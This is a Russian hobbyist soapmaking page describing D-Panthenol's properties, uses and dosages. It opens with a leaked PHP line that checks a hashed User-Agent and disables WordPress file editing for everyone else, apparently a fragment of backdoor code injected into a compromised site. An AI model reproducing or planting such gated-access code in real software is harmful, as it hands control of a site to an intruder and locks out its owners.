if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Д‑Пантенол | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Д‑Пантенол

Д-Пантенол – витамин группы В. Стабилен при воздействии воздуха и света, однако теряет устойчивость при нагревании выше 50 °C. Хорошо растворим в воде, пропиленгликоле, спиртах, слабо растворим в глицерине

Ингредиенты для мыла - Д-Пантенол Ингредиенты для мыла - Д-Пантенол

Д‑Пантенол – вита­мин груп­пы В. Ста­би­лен при воз­дей­ствии воз­ду­ха и све­та, одна­ко теря­ет устой­чи­вость при нагре­ва­нии выше 50 °C. Хоро­шо рас­тво­рим в воде, про­пи­лен­гли­ко­ле, спир­тах, сла­бо рас­тво­рим в глицерине.

Вид: полу­про­зрач­ная вяз­кая жидкость.

 

Свой­ства и характеристики:

Д‑Пантенол спо­соб­ству­ет реге­не­ра­ции кожи, увлаж­ня­ет ее. Глу­бо­ко про­ни­ка­ет в кожу, свя­зы­ва­ет воду в верх­нем слое кожи, волос, ног­тей, что обес­пе­чи­ва­ет удер­жа­ние вла­ги. Кожа и воло­сы ста­но­вят­ся более эла­стич­ны­ми и мяг­ки­ми. Д‑Пантенол так­же ока­зы­ва­ет про­ти­во­вос­па­ли­тель­ный эффект, при­ме­ня­ет­ся для лече­ния кож­ных раз­дра­же­ний, вклю­чая дет­ский пеле­ноч­ный дер­ма­тит. Этот ком­по­нент так­же спо­соб­ству­ет ско­рей­ше­му зажив­ле­нию ран, ожо­гов, тре­щин, сса­дин, про­леж­ней, повре­жде­ний кожи во вре­мя бри­тья. Сни­ма­ет ощу­ще­ние сухо­сти после исполь­зо­ва­ния мыла.

При­ме­не­ние:

Д‑Пантенол исполь­зу­ет­ся в самых раз­ных кос­ме­ти­че­ских рецеп­ту­рах: сред­ствах для кожи, волос, в дет­ских кре­мах, солн­це­за­щит­ных сред­ствах, кре­мах после бри­тья. В сред­ствах по ухо­ду за воло­са­ми Д‑Пантенол фор­ми­ру­ет защит­ную плен­ку, кото­рая сохра­ня­ет вла­гу на про­тя­же­нии дли­тель­но­го вре­ме­ни; про­ни­ка­ет в фол­ли­ку­лы и пря­ди волос, утол­ща­ет воло­сы, пре­пят­ству­ет их повре­жде­нию, сни­ма­ет зуд кожи голо­вы. В солн­це­за­щит­ных кре­мах Д‑Пантенол повы­ша­ет фор­ми­ро­ва­ние защит­но­го пиг­мен­та и сни­жа­ет воз­дей­ствие на кожу УФ-лучей.

Добав­ля­ет­ся в вод­ную фазу, нагре­ва­ет­ся до тем­пе­ра­ту­ры не выше 50 °С.

 

Дози­ров­ка:

- для шам­пу­ней, баль­за­мов, кон­ди­ци­о­не­ров для волос: 0,1–5%;

- для кос­ме­ти­че­ских средств по ухо­ду за кожей: до 4%;

- для лечеб­ных наруж­ных пре­па­ра­тов: 2–5%.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!